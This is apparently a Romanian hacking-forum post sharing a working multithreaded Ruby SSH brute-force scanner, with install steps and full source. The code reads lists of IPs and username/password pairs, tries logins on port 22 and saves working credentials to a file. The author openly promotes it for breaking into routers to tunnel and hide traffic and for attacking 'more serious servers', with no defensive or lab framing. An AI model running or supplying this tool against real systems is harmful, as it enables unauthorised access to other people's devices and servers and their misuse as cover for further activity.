SSH bruteforce, multithreaded.

[mindark]

Un bruteforce de ssh facut de mine in ruby, l-am testat pe masina virtuala pe un Intel core i5-750, da la 100 incercari/s. Ideal pentru a gasi vreun router, ca sa faceti ssh tunel si sa ascundeti traficul sub ssl, dar deasemenea il puteti folosi pentru a scana servere mai serioase.

Pentru a rula programul instala?i Oracle JDK, si jruby ultimele versiuni pentru threaduri reale, nu green.

Apoi din jruby/bin ii dati:

gem install colorize
gem install net-ssh

Iata si codul la program. Curind voi posta un checker, care va sorta rezultatele la servere/routere.

require 'rubygems'
require 'net/ssh'
require 'colorize'
require 'thread'
require 'socket'
require 'timeout'

def port_open?(ip, port, seconds=1)
  Timeout::timeout(seconds) do
    TCPSocket.new(ip, port).close
	return true
  end
rescue Exception => e
  return false
end

if ARGV.length!=4 then
  abort('ruby scan.rb <ips> <users> <threads> <goods>')
end
ips, users, num_threads, routers = open(ARGV[0]).map{|line| line.gsub("\n", '')}, open(ARGV[1]).map{|line| line.gsub("\n", '')}, ARGV[2].to_i, File.new(ARGV[3], 'w')
threads = []
scanned = 0
lock = Mutex.new
num_threads.times do
  threads<<Thread.new do
    while ips.length>0
      ip = ''
      lock.synchronize {ip = ips.pop}
      next if !port_open?(ip, 22)
      users.each do |user|
        begin
          username = user.split("/")[0]
          password = user.split("/")[1]
          scanned += 1
          lock.synchronize{puts "#{scanned} tries, #{ips.length} remaining: trying #{ip} with user: #{username} and pass: #{password}".green}

		      Timeout::timeout(5) do
            Net::SSH.start(ip, username, :password => password) do |ssh|
              puts "#{scanned}: found router #{ip}".red
              routers.write("#{ip}:#{username}:#{password}\n")
				      routers.flush
            end
			    end
          break
        rescue Exception => e
        end
      end  
    end
  end
end
threads.each{|th| th.join}

Edited October 21, 2012 by mindark